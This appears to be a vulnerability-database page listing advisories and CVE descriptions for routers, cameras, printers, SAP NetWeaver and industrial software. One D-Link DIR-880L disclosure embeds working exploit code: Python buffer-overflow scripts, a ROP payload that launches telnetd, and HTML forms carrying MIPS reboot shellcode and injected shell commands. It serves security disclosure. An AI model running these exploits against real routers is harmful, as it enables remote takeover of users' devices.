nn-2023_5-01 Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_16-01 Path traversal via 'zip slip' in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_14-01 Unsafe temporary data privileges on Unix systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_13-01 Missing authentication for local web interface in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_1-01 Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2 2023-05-03T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2021_2-01 Authenticated command path traversal on timezone settings in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2021_1-01 Authenticated command injection when changing date settings or hostname in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2020_3-01 Angular template injection on custom report name field 2020-05-26T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2020_2-01 Cross-site request forgery attack on change password form 2020-05-26T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2019_2-01 CSV Injection on node label 2019-11-11T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2019_1-01 Stored XSS in field name data model 2019-11-11T11:00:00.000Z 2024-05-20T11:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
oxdc-adv-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxdc-adv-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxas-adv-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
oxdc-adv-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
oxas-adv-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
oxas-adv-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
oxas-adv-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
oxas-adv-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 2023-05-02T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 2023-03-20T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2023-02-06T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2022-11-02T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2022-08-10T00:00:00+02:00 2024-01-22T00:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-200607-0396 Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe). Used in the following products eIQnetworks Enterprise Security Analyzer (ESA) Is Syslog daemon (syslogserver.exe) A stack-based buffer overflow vulnerability exists due to a flaw in handling. During the processing of long arguments to the LICMGR_ADDLICENSE command a classic stack based buffer overflow occurs. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port. eIQnetworks Enterprise Security Analyzer (ESA) is an enterprise-level security management platform. The following commands are known to be affected by this vulnerability:  DELTAINTERVAL  LOGFOLDER  DELETELOGS  FWASERVER  SYSLOGPUBLICIP  GETFWAIMPORTLOG  GETFWADELTA  DELETERDEPDEVICE  COMPRESSRAWLOGFILE  GETSYSLOGFIREWALLS  ADDPOLICY  EDITPOLICY. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. ZDI-06-023: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-023.html July 25, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: eIQnetworks Enterprise Security Analyzer Astaro Report Manager (OEM) Fortinet FortiReporter (OEM) iPolicy Security Reporter (OEM) SanMina Viking Multi-Log Manager (OEM) Secure Computing G2 Security Reporter (OEM) Top Layer Network Security Analyzer (OEM) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since by Digital Vaccine protection filter ID N/A. Authentication is not required to exploit this vulnerability. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor - Digital Vaccine released to TippingPoint customers 2006.07.25 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Titon, JxT, KF and the rest of Bastard Labs. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-202308-3520 TP-Link Tapo C210 ActiveCells Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Tapo C210 IP cameras. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the ActiveCells parameter of the CreateRules and ModifyRules APIs. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20589. TP-LINK Tapo C210 is a network camera device from China's TP-LINK company
var-202310-1968 An issue found in D-Link DSL-3782 v.1.03 and before allows remote authenticated users to execute arbitrary code as root via the Router IP Address fields of the network settings page. D-Link Systems, Inc. of DSL-3782 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202312-0648 TP-Link TL-WR841N dropbearpwd Improper Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of TP-Link TL-WR841N routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from improper authentication. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-19899
var-201112-0173 The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. A vulnerability in certain Hewlett-Packard devices could allow a remote attacker to install unauthorized firmware on an affected system. HP Printers and Digital Senders are prone to a security-bypass vulnerability. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-202303-1251 TP-Link Archer AX21 tdpServer Logging Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer AX21 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the logging functionality of the tdpServer program, which listens on UDP port 20002. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19898. TP-LINK Archer AX21 is a wireless router from China's TP-LINK company
var-201803-1810 A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process. Failed exploit attempts will likely cause a denial-of-service condition. Versions prior to DOPSoft 4.00.04 are vulnerable
var-201807-0341 ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IPAddress parameters of the ABB BEControlLogix OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland
var-201011-0225 Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-201507-0645 D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. Failed exploits may result in denial-of-service conditions. ## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com) . ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline
var-202307-1219 NETGEAR ProSAFE Network Management System SettingConfigController Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SettingConfigController class. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-19725
var-201112-0297 Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
